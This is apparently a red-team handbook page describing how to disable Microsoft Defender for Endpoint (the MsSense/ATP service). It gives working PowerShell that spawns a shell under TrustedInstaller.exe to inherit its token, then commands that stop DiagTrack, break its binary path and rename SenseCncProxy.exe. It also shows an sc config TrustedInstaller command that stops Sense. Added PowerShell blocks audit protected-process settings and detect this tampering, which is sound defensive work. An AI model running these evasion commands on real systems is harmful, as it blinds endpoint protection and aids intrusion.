# Trusted Installer

MsSense runs as a Protected Process Light (PPL) service, meaning that even with SYSTEM privileges we will not be able to stop it.

However, Microsoft allows "trusted callers" to manage protected services and other critical resources in the system. This "trusted caller" is a service called TrustedInstaller.

You may have seen this account before while looking at the ACLs of certain system binaries:

![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsQTfz76-OFHcID1sL%2Fimage.png?alt=media\&token=b13606e3-60fd-4d39-b789-58841dc451de)

As you can see, it is given Full control of calc.exe, and it is the only principal that has Full control.

It is also given Full control over svchost.exe, the host process for the DiagTrack service.

![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsQjALYU9kiVxhV23_%2Fimage.png?alt=media\&token=702af2c4-30c9-4c5a-bd91-40702a7c4c7e)

The TrustedInstaller service itself, however, is not configured as PPL:

![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsR4RVQtIoHYNpmc_H%2Fimage.png?alt=media\&token=ad720569-4157-46e7-9ee2-165ab663f5cd)
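The PPL status of a service is driven by the `LaunchProtected` value under its registry key, which the Service Control Manager reads at start. The following PowerShell is an added defender-side check, not code from the handbook or from Microsoft: it reads that value for every installed service and reports the three services this page talks about (Sense, DiagTrack, TrustedInstaller) alongside a baseline of everything that is protected. The level names (1 = Windows, 2 = Windows Light, 3 = Antimalware Light) follow Microsoft's "Protecting anti-malware services" documentation; a missing value means the service is not protected.

```powershell
# Added example (not from the handbook): audit which services are registered as PPL.
# LaunchProtected: 1 = Windows, 2 = Windows Light, 3 = Antimalware Light; absent/0 = none.
$levelNames  = @{ 0 = 'None'; 1 = 'Windows'; 2 = 'WindowsLight'; 3 = 'AntimalwareLight' }
$servicesKey = 'HKLM:\SYSTEM\CurrentControlSet\Services'

function Get-ServiceProtection {
    param([string[]]$Name)   # optional filter; no argument = every service

    Get-ChildItem -Path $servicesKey -ErrorAction SilentlyContinue | ForEach-Object {
        $svc = $_.PSChildName
        if ($Name -and ($svc -notin $Name)) { return }

        # A few service keys are not readable even by administrators; skip those quietly.
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if (-not $props) { return }

        $level = [int]$props.LaunchProtected   # $null (value absent) casts to 0
        [pscustomobject]@{
            Service         = $svc
            LaunchProtected = $level
            Level           = if ($levelNames.ContainsKey($level)) { $levelNames[$level] } else { "Unknown($level)" }
            ImagePath       = $props.ImagePath
        }
    }
}

# The services discussed on this page: Sense (MsSense.exe), DiagTrack and TrustedInstaller.
Get-ServiceProtection -Name Sense, DiagTrack, TrustedInstaller | Format-Table -AutoSize

# Baseline of every protected service on the host, useful for spotting a service
# whose LaunchProtected value has been lowered or removed.
Get-ServiceProtection | Where-Object LaunchProtected -ne 0 | Sort-Object Service | Format-Table -AutoSize
```

The same information can be cross-checked per service with `sc.exe qprotection <service>`, which asks the SCM directly rather than reading the registry.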

So does that mean we can just change TrustedInstaller's binary path to stop the ATP Sense service?

```
sc config TrustedInstaller binPath= "cmd /C sc stop sense" && sc start TrustedInstaller
```

Well, you can't: this is a known technique that ATP is aware of, and it will raise an alert if you try.

Alright, so since TrustedInstaller is a service running without PPL, we could spawn a cmd prompt with TrustedInstaller.exe as its parent (the child inherits TrustedInstaller's security token) and use that prompt to disable the ATP service.

The picture below explains why this works:

![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsTT98hXFMBYntDXmP%2Fimage.png?alt=media\&token=664a4b24-e9ec-4b23-8cb0-7020c6d2bbdf)

To do this, we need SeDebugPrivilege (which you can enable if you are an administrator).

We will use PowerShell and two .NET DLLs from James Forshaw which ease the whole process for us. These are called NtObjectManager.dll and NtApiDotNet.dll.

You can find these DLLs here:

{% embed url="https://github.com/googleprojectzero/sandbox-attacksurface-analysis-tools" %}

These DLLs will not trigger any alerts by themselves: they are a legitimate, publicly available library that is just a thin wrapper around Windows' low-level native APIs.

We will first load the two DLLs into memory:

```
# Both DLLs are assumed to be in the current directory.
# NtApiDotNet is loaded first because NtObjectManager depends on it.
$b = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$PWD\NtApiDotNet.dll"))
$a = [System.Reflection.Assembly]::Load([System.IO.File]::ReadAllBytes("$PWD\NtObjectManager.dll"))
```

We will then import the loaded assemblies as modules:

```
Import-Module $a
Import-Module $b
```

We will then enable the SeDebug privilege:

```
# Enable SeDebugPrivilege on the current process's primary token (requires an admin token)
$token = Get-NtToken -Primary
$token.SetPrivilege([NtApiDotNet.TokenPrivilegeValue[]]"SeDebugPrivilege", [NtApiDotNet.PrivilegeAttributes]"Enabled")
```

Then start the TrustedInstaller service and get a handle to its process:

```
Start-Service TrustedInstaller
# Open the running TrustedInstaller.exe process (SeDebugPrivilege is needed for this)
$handle = Get-NtProcess -Name "TrustedInstaller.exe"
```

We will then call the CreateProcess method to launch cmd.exe with TrustedInstaller.exe as its parent process.

```
$config = New-Object NtApiDotNet.Win32.Win32ProcessConfig
$config.CommandLine = "cmd"
$config.CreationFlags = [NtApiDotNet.Win32.CreateProcessFlags]16   # 16 = CREATE_NEW_CONSOLE
$config.ParentProcess = $handle                                    # reparent under TrustedInstaller.exe
[NtApiDotNet.Win32.Win32Process]::CreateProcess($config)
```

Then our cmd prompt will pop up, running with TrustedInstaller's token!

From there, we can just stop the MsSense and DiagTrack services:
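On the defensive side, the tell for this technique is the parent/child relationship itself: TrustedInstaller.exe is the Windows servicing host and does not normally spawn interactive shells. The PowerShell below is an added example written for this page, not code from the handbook or from the NtObjectManager project: it walks the live process list via `Win32_Process`, finds every process whose parent is TrustedInstaller.exe, and reports the image, command line and token owner. Because `ParentProcessId` is not cleared when a parent exits and PIDs are reused, it also requires the recorded parent to have started before the child.

```powershell
# Added example (not from the handbook): report processes running under TrustedInstaller.exe.
function Get-TrustedInstallerChildren {
    $procs = Get-CimInstance -ClassName Win32_Process
    $byPid = @{}
    foreach ($p in $procs) { $byPid[[int]$p.ProcessId] = $p }

    foreach ($p in $procs) {
        $parent = $byPid[[int]$p.ParentProcessId]
        if ($null -eq $parent) { continue }                        # parent already gone
        if ($parent.Name -ne 'TrustedInstaller.exe') { continue }

        # Guard against PID reuse: a real parent must have started before its child.
        if ($parent.CreationDate -and $p.CreationDate -and ($parent.CreationDate -gt $p.CreationDate)) { continue }

        $owner = Invoke-CimMethod -InputObject $p -MethodName GetOwner -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Pid         = $p.ProcessId
            Image       = $p.Name
            CommandLine = $p.CommandLine
            ParentPid   = $parent.ProcessId
            ParentImage = $parent.Name
            Owner       = if ($owner -and $owner.User) { "$($owner.Domain)\$($owner.User)" } else { '<unknown>' }
            Started     = $p.CreationDate
        }
    }
}

$children = @(Get-TrustedInstallerChildren)
if ($children.Count -eq 0) {
    'No children of TrustedInstaller.exe found.'
} else {
    # Any cmd.exe / powershell.exe here deserves a closer look.
    $children | Format-Table -AutoSize
}
```

The same logic applies to historical data: with Sysmon, process creation events (Event ID 1) carry `ParentImage` and `Image`, so a rule matching `ParentImage` ending in `\TrustedInstaller.exe` with a shell as `Image` catches this after the fact, not just while the prompt is open.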

```
C:\Windows\System32> sc config diagtrack binpath= "ploopy"
C:\Windows\System32> sc stop diagtrack
```

Or just rename the executable:

```
rename "C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe" blah
```

This will effectively stop the ATP process.
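Both ways of killing the service leave a footprint on disk and in the registry: the service's `ImagePath` no longer points at a real file, or a component next to MsSense.exe has lost its name and signature. The PowerShell below is an added defender-side check for this page, not code from the handbook or from Microsoft. It resolves each service's image from its `ImagePath` (handling quoted paths, unquoted paths with spaces, `%SystemRoot%` and `svchost.exe -k ...` forms), confirms the file exists and carries a valid Authenticode signature, and then lists files in the Sense install directory that are either unsigned PE files or have no extension at all. The service names are the ones used on this page; nothing else is hard-coded.

```powershell
# Added example (not from the handbook): verify the Sense/DiagTrack service binaries are intact.
function Resolve-ServiceImage {
    param([string]$ImagePath)
    if (-not $ImagePath) { return $null }
    $expanded = [Environment]::ExpandEnvironmentVariables($ImagePath).Trim()

    if ($expanded.StartsWith('"')) {
        # Quoted path: everything up to the closing quote is the image.
        $end = $expanded.IndexOf('"', 1)
        if ($end -gt 1) { return $expanded.Substring(1, $end - 1) }
        return $expanded.Trim('"')
    }

    # Unquoted: the path may contain spaces, so try the longest prefix that exists on disk
    # (e.g. "C:\Windows\System32\svchost.exe -k utcsvc -p" resolves to svchost.exe).
    $parts = $expanded -split ' '
    for ($i = $parts.Count; $i -ge 1; $i--) {
        $candidate = ($parts[0..($i - 1)] -join ' ')
        if (Test-Path -LiteralPath $candidate -PathType Leaf) { return $candidate }
    }

    # Nothing exists: return the first token so the caller can report it as missing.
    # Bare names such as "svchost.exe" are relative to System32.
    $candidate = $parts[0]
    if (-not [IO.Path]::IsPathRooted($candidate)) {
        $candidate = Join-Path $env:SystemRoot "System32\$candidate"
    }
    return $candidate
}

function Test-ServiceBinary {
    param([string[]]$Name)
    foreach ($svc in $Name) {
        $props  = Get-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\$svc" -ErrorAction SilentlyContinue
        $image  = Resolve-ServiceImage -ImagePath $props.ImagePath
        $exists = $image -and (Test-Path -LiteralPath $image -PathType Leaf)
        $sig    = if ($exists) { Get-AuthenticodeSignature -FilePath $image } else { $null }
        $state  = (Get-Service -Name $svc -ErrorAction SilentlyContinue).Status
        [pscustomobject]@{
            Service   = $svc
            State     = if ($state) { [string]$state } else { '<missing>' }
            ImagePath = $props.ImagePath
            Resolved  = $image
            Exists    = [bool]$exists
            Signature = if ($sig) { [string]$sig.Status } else { 'n/a' }
            Signer    = if ($sig -and $sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { 'n/a' }
        }
    }
}

function Get-DirectorySignatureReport {
    param([string]$Image)
    if (-not $Image) { return }
    Get-ChildItem -LiteralPath (Split-Path -Parent $Image) -File -ErrorAction SilentlyContinue | ForEach-Object {
        $isPe = $_.Extension -in '.exe', '.dll', '.sys'
        [pscustomobject]@{
            File      = $_.Name
            Signature = if ($isPe) { [string](Get-AuthenticodeSignature -FilePath $_.FullName).Status } else { 'n/a' }
        }
    }
}

$results = Test-ServiceBinary -Name Sense, DiagTrack, TrustedInstaller
$results | Format-List

# Files beside MsSense.exe that are unsigned PE files or carry no extension (a renamed binary).
$sense = $results | Where-Object Service -eq 'Sense'
Get-DirectorySignatureReport -Image $sense.Resolved |
    Where-Object { ($_.Signature -ne 'n/a' -and $_.Signature -ne 'Valid') -or (-not [IO.Path]::HasExtension($_.File)) } |
    Format-Table -AutoSize
```

A `binpath=` pointing at a non-existent file shows up as `Exists = False` for the service, and a renamed component shows up in the directory listing as an extensionless file; both are worth comparing against a known-good host rather than judged in isolation, since the Sense directory legitimately contains non-PE data files.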
